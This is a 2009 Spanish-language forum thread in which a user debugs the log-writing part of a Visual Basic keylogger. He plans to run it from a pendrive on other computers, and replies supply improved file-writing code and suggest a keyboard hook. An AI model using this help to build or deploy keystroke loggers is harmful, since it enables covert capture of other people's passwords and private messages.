elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  logs mal hechos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: logs mal hechos  (Leído 2,363 veces)
Daklon

Desconectado Desconectado

Mensajes: 57



Ver Perfil
logs mal hechos
« en: 31 Octubre 2009, 22:30 pm »

para el keylogger uso GetAsyncKeyState y para que se guarde automaticamente si intervencion del usuario uso este codigo
Código:
Private Sub Timer2_Timer()
Dim NumeroArchivo As Integer
Dim ruta As String
archivo = FreeFile
ruta = App.Path & "\log.txt"
Open (ruta) For Append As #archivo
If Text1.DataChanged = True Then
Print #archivo, (Text1)
Text1.Text = ""
Close #archivo
Else
Close #archivo
End If
End Sub

pero al hacer los logs me hace esto

Código:
IZ.R]
esto[Espacio]
es[Espacio]una[Espacio]p
rue
[Retroceso]
bapa
ra[Espacio]ver[Espacio]qu
e[Espacio]pasa


eps
e
ro[Espacio]
10[Espacio]s
eg









ya

en ese gran espacio espere 10 seg en los que no deberia escribir nada por el if pero aun asi escribe espacios

pd: le dije que cada vez que guardara pusiera el text1 en blanco porque antes me ponia lo que tenia mas lo nuevo por ejemplo

Código:
h
ho
hol
hola


En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: logs mal hechos
« Respuesta #1 en: 1 Noviembre 2009, 00:06 am »

Antes que nada usa el Geshi e Indecta tu codigo, es casi imposible leerlo asi como esta.

por otro lado aquí te dejo el codigo un poco mejorado


----------------------------->

EDITO: Corregi unas variables:

Código
  1. Const Satisfacción = "Se ecribir en el archivo correctamente"
  2. Const Insatisfaccion = "No se a escrito nada por que no hay nada que escribir, o hay un error en el acceso del archivop "
  3. Dim NumeroArchivo           As Integer
  4.  
  5. Private Sub Form_Load()
  6. Dim Cabecera                As String
  7. Dim Ruta                    As String
  8. Dim ContinuarLog            As Boolean ' Esta variable es solo para que entiendas la función Escribir.
  9.  
  10.    Ruta = "c:\log.txt"
  11.    NumeroArchivo = FreeFile
  12.    '   //  Se sobre escribe el Log Anterior a este?
  13.    ContinuarLog = True '   //  El true significa que se seguira desde el ultimo byte,
  14.                        '   //  Si se póne False, va ir reemplzando desde el primer byte
  15.    Open Ruta For Binary Access Write As #Archivo
  16.    '   //  Comprobamos el peso del log
  17.    If LOF(NumeroArchivo) > 0 And ContinuarLog Then
  18.        Cabecera = vbCrLf & vbCrLf
  19.    End If
  20.    Cabecera = Cabecera & "Inicio de Archivo Log" & vbCrLf & _
  21.                    vbTab & "Iniciado el Dia: " & Date & vbCrLf & _
  22.                    vbTab & "Hora de Inicio: " & Time & vbCrLf & _
  23.                    vbCrLf & _
  24.                    "--------Inicio del Log----->" & vbCrLf & vbCrLf
  25.    If Escribir(NumeroArchivo, Cabecera, ContinuarLog) Then
  26.        Debug.Print Satisfacción
  27.    Else
  28.        Debug.Print Insatisfaccion
  29.    End If
  30. End Sub
  31. Private Sub Timer1_Timer()
  32.    If Escribir(NumeroArchivo, Text1.Text, True) Then
  33.        Text1.Text = ""
  34.        Debug.Print Satisfacción
  35.    Else
  36.        Debug.Print Insatisfaccion
  37.    End If
  38. End Sub
  39. Private Function Escribir(NumberOFileOpen As Integer, vData As String, Optional UltimoByte As Boolean = False)
  40. On Error GoTo eError:
  41.    If Variable = "" Then
  42.        If UltimoByte = True Then
  43.            Seek #NumberOFileOpen, LOF(NumberOFileOpen) + 1'    // Nos movemos al final del archivo
  44.        End If
  45.        Put #NumberOFileOpen, , vData
  46.        Escribir = True
  47.    End If
  48.    Exit Function
  49. eError:
  50.    Escribir = False
  51. End Function
  52. Private Sub Form_Unload(Cancel As Integer)
  53.    Close NumeroArchivo
  54. End Sub
  55.  

Dulces Lunas!¡.


« Última modificación: 1 Noviembre 2009, 00:19 am por ░▒▓BlackZeroҖ▓▒░ » En línea

The Dark Shadow is my passion.
Daklon

Desconectado Desconectado

Mensajes: 57



Ver Perfil
Re: logs mal hechos
« Respuesta #2 en: 1 Noviembre 2009, 00:28 am »

ahora que me fijo hay un error auqneu parece que no afecta

el error es que yo establezco la variable numeroarchivo pero luego uso #archivo

la ruta prefiero usar app.path como estaba porque la idea es que el keylogger se ejecute en un pendrive y como no en todos los ordenas se le asigna la misma letra pues asi me aseguro que se guarda en el pendrive

y el log en mi codigo no se sobreescribe porque uso open "" For append As #Archivo
asi que lo que hace es añadir lo que esta en el text1.text al archivo log.txt

no se si te referias a si se sobreescribe en mi codigo o en que me pasate tu

ese lo pruebo mañana porque creo que em voy a ir ya que estoy cansado  :xD
En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: logs mal hechos
« Respuesta #3 en: 1 Noviembre 2009, 00:34 am »

jamas me referi a nada de lo que me citas, lo de la ruta la puse asi por que no deseo mover a C.\archivos\ bla bla bla hasta la carpat de mi visual se entiende?, lo demás si quieres adaptalo a tu proyecto es cosa tuya, yo solo te he puesto un ejemplo.

Lo de Append  si lo entiendo y se que hace. pero no utilizo yo esos ya que para eso uso el acceso Binario en modo aleatorio y el seek()...

tecnicamente te hice este ejemplo por que tu abres y cierras bruscamente el archivo variadas veces en el timer.
« Última modificación: 1 Noviembre 2009, 00:43 am por ░▒▓BlackZeroҖ▓▒░ » En línea

The Dark Shadow is my passion.
Daklon

Desconectado Desconectado

Mensajes: 57



Ver Perfil
Re: logs mal hechos
« Respuesta #4 en: 1 Noviembre 2009, 00:44 am »

lo hago asi porque creo que esa es la mejor forma ya que me interesa que se quede escrito todo hasta el momento en el que se retira el pendrive

y otra cosa

puedo parecer algo noob pero como uso el geshi? porque el codigo no me lo da en bbcode para poder ponerlo aqui y que salga bien
En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: logs mal hechos
« Respuesta #5 en: 1 Noviembre 2009, 01:43 am »

puedo parecer algo noob pero como uso el geshi?

encerra el codigo entre [ code=vb] [ /code] , (quitale el espacio despues del corchete). y una recomendación es que uses Hook para el teclado, es lo mejor, no tenes que andar renegando con Timers.si buscas en el foro vas a encontrar un monton de ejemplos.
« Última modificación: 1 Noviembre 2009, 01:45 am por seba123neo » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines